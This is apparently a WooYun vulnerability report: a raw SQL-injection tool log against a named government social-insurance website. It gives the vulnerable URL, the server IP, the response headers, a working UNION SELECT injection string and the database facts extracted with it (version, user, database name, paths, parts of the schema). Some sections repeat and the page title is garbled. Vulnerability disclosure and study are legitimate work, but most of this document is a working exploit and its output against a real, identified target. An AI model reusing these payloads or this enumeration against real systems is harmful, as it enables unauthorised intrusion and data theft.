WooYun.org

存在注入的地址：http://www.aqshbx.gov.cn/special.php?action=show&id=1
■注入点信息：============================================================
·URL：http://www.aqshbx.gov.cn/special.php?action=show&id=1
·页面标题：瀹夊簡甯傜ぞ浼氫繚闄╀俊鎭綉
·参数：action=show&id=1
·提交方式：GET
·注入类型：文本型
·注入方式：And
·页面类型：php
·IP地址：218.23.241.134
·数据库类型：MySQL
·HEAD
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jan 2013 21:25:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
总列数：13
显示的列：3
联合查询SQL：' and 3=8 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- And '8'='8
基本信息：============================================================
- version():5.1.29-rc-community
- database():aqsbj
- user():aqsbj@localhost
- session_user():aqsbj@localhost
- current_user():aqsbj@localhost
- system_user():aqsbj@localhost
- @@basedir:D:\mysql5\
- @@datadir:D:\mysql5\Data\
- @@tmpdir:C:\WINDOWS\TEMP
- @@version_compile_os:Win32
- 可否使用单引号：yes
- 有INFORMATION_SCHEMA ：yes
■ 数据库列表：
数据库名 默认字符集名
------------------------------------------------------------
记录数：2
■ mysql 的表：
表名 总记录数
------------------------------------------------------------
获取记录数失败，使用预设值：5
记录数：5
■ 数据库列表：
数据库名 默认字符集名
------------------------------------------------------------
记录数：2
■ mysql 的表：
表名 总记录数
------------------------------------------------------------
获取记录数失败，使用预设值：5
记录数：5
■ mysql.db 的字段：
列名 数据类型 字符集名
------------------------------------------------------------
获取记录数失败，使用预设值：5
记录数：5
总列数：13
显示的列：3
联合查询SQL：' and 3=8 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- And '8'='8